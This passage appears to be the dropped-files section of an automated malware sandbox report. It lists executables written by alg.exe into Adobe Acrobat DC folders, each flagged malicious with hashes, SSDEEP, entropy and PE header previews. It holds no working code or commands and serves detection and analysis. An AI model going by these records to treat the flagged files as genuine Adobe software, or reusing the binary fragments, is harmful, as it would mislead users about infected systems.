                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.497769516282855
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:4tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7554LNiXico:4jEIa4HIEWOc5G7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:9DB9364E6750F0B463C1E46F896C0F30
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6E680F677C7619FF066AB767B2AA384FBB7F1EB5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:DFF8D794FF1352AA1D703D7FD078E7111658ACDBF3EFB4DA115D0DFD7089265A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:ADFE088DB4FF09C796692CCE069EE74C3B33847754D3280869A475AC952E489875D6544CC56320BC811E5A2CC9E9B50B5CD0988B4D735FB58F6663A275B01355
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999360391534468
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:1572864:+Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:9XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:1D39105D328C31B6C46418C45CF08D38
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F5F4F0B9E0C094FEEEA0E886FDAC57C389B45288
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B75C0035C4F8599276F4A3FD5331F86EDDF33E0E494FE6ADE056E6BDAD3A2ED9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:962A25207D64825703338EFAAFC5C818CAD492FEAEDE0C7FCADA73F97FD886503071ABDC7824631565EF633E5FB135ED81A8EAEF629BD621B8D474A78180F6EC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1335808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.597044716839718
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KW8iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Kn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:70C7697D68B1D5975C168CDB6C1247AD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C64CF95C7199DB7FED906FEEFFEB25AB12970EC2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D293559ABC434695C0636CC4EEA678EDA57F42719C7A2BABA877069F66FEF5E7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:50A53075557C8A48B980A60C8C7D5278548393D00AA016D80C9FBF834F304BB0DA53D1EA7F5B612A1D9BCEFAAC13EE908292DF9764134AC20455B9FD4080CFD7
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.385265848124412
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:ODvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXr:PnN9KfxLk6GEQTX5UKzND97wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D06A34973B82AF7CF57D62B9DDF60B01
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:66BC249889981C1FBAD6A1F59855CE34933D2F49
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:75A2760A4D1336B0C1CC869DAF337FCB296435957F9A6DD39C1385848FE622B7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FE183709C6B59903FC40BD473CD381E0C32DDAB99D653BF873B2178630A70EF718800121141979F8162F308D99899067098CDA51E28118EC0C6C8892781682C1
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.548413853839869
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:SX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:C4BDD1D3542A21CA8EB990CCEE7F09E7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0F90994DB886897A618475482F522F2CD69B8C64
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:61B4FF1698513A77B4A424161C867DCDA20BCD67F22A6DE3E2739B01AEEA411A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4A9DF71A32280AB8C50465CAB60C96E4C8C3E3DC09516758E565EF22C9FC6E294BF0B407084064E4FE882ADEC1E369EAEE52CD7E8683CF703FE0B836D6B34FCB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.59597034663094
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:2b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKI7wRGpj3:AnPgTHIwZoRBk9DdhSUEVIXgKUF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:08E0D317269DB761921BD9568158C2D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A8E8ED562C823E44B3C7717FECC448A5E3A9E778
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E42091E6F0958580E4C298CACBDA11988B3782F0CF701421C3E5D4F95C1E4828
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FF2D8CB24BF09B3AA66BBFE5B8E474D7A577D7AB6CA379A7C4A4290348507C4F47FFE10FD0326E5699B9A3406427507553FEF52105C54A0A2F285DF2E59BD066
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................4a.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1478144
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.829898600087479
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Bg5FvCPWs4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WfFzLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5BACADC2EC3ECD7469B65406BA8F6F42
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A799017C6AF12944D3E11F9BE2D1B3838C6744C9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B32D5130F19CD37EFA63AFD8C8DAD5B3352990F27564ABA5DF391CB1FF242301
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:F7D6FB684E8BBB7C20F8D3332A96F96F8142736002D2E70F8160EC9A19B8204A8D59FE1924D1AE8EDB6A8059AEADF8488886CA4FA2C7AA94E55AA082AF26CB52
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!......N.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.202739011020617
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:JjKTIsAjFuvtIfmFthMaT5U8aChaeuC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JjIMmPh7TT79bLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:13FE6BD3AF6DFDF966E1E5DC3AB18C8A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6346C3F5840A222506BAE47C3148746EDC3387E0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AAFDCA71B9C22B75EB7448B7FCB34FD3A50F3C2970BFE0BEB228C58C53413325
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:DD52CC84506A778CDB80A21EFA34EC24F7F48B5FDAA94323295F41A78BD8F4C966D225992FBA438D6D0B0BB937F0A86760B064265227627B3C40FAFB63D68E9C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......F.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1671168
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008260407773543
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:NGqVwCto1em5Wg+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8Z1emUNLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:670B3D50F9769D9D53204A7D55204DA6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F4EBD72D48271B827ABADE7BF2302FDD6E010E7F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0E75045709EFCA21BD5500ECD2A5FCF110C0B23A5FE98220D66C3D27098D7004
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:E373EE80DD965026453BFFF737EAC161F6477CA67BA8331D393E969ACBD8A7BAE0B5A50E1C5FBA43C091FD1011BBD3BD9ECD34CB556080716526B2716A69741A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$.......... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1409024
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.690541947425694
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:eWBWf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:14E0F7D4A72677ACA197DBE8B9E404B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5A05D9C7B47654569CB10C254C670634289D53CF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3681B1543CD7704837321350256B7BFF6A57A02EB02E9509D0DB8B8807CA93DE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2897FDF5823CA45811B856B9D21B76A8248F7D72C4A93799BF2F1B3B2B3942C55E97F1837D2249BB76241615090000933CB52CDD057C13ED565AE26F9AA6951D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p ........... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.223535384881754
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:5+GtCi27mVTyT+a0BLNiXicJFFRGNzj3:Mmd27e7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:473734991AA8E4905C68350FC1ADD5AC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2104C5F739B7C8CFF9716558153BD32B7917DEE1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:02B88C864A5A879E0F70447D1080ABA097CB2EDC6571689AD69FED4958C5BB4E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6EDBB0BFDB09E799C9648902EDF5F6FA2CA6D4F0849671E8434C029C4437CDD042D981447C44A42AF2DE4A1BAB92778ADAE35D65951305EF0058075F2D1086D2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.648200500413914
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:IU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYmLNiXicJFFRGNzj3:52NfHOIK5Ns6qR907wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:6F78A72037A3069E24192555FE805766
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9BEFE9EA182B542FEB797F325904F084F4AC06B2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:870CE0B28BEAB9DE779F4B608965EF96A42CFC73D985D263CDFA0FA7D58BD4BD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:031CF6CA37BE85D0C05A9D99437E781F481E41C90E94F00BCD7AEEB9B5C64A5DFD1247588F0E9AAC74187F2F1AD81104708D3318DD29A31091E65E58462B2545
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......E0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.139931790270903
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:ZkDWTUQcydO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZqKUZLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7B857ED7E2166F84A9000B9087DA9C1D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6A61E185FB94E1197AEC0AE68688BCC2CB8A7522
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F70D22720DD41FE684DAD3E274625916BE925451571BF0AF0DBA19E3FC675D77
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:80A106E6D59681AB062755B0A00C36D4AEB021A6D27F6269F8153571C60713C71CA1BEB44E13651C78773713929D932E9564F01303931FAA25C3A3FC033650F3
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%......+.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1494016
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901008572601023
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:eI+qBx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:L+SLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F4B79993364BE4F0525964F460EE5D88
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:E137F2330F6BD7FF5AD7F26279FB5DF3BCD228BB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E10718A58328F837EAAE4D072C21001CF66555BD162E8533D1147F5F6577ECC9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:EA79A264A5ECC439E86BF96D467D1B3BFF694F0F9B3763BDDDAAA8878E1AA0EA2CED44F507139C63FF52E64B4279080F0A26F72B65605822BE44C59D3081E3BF
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
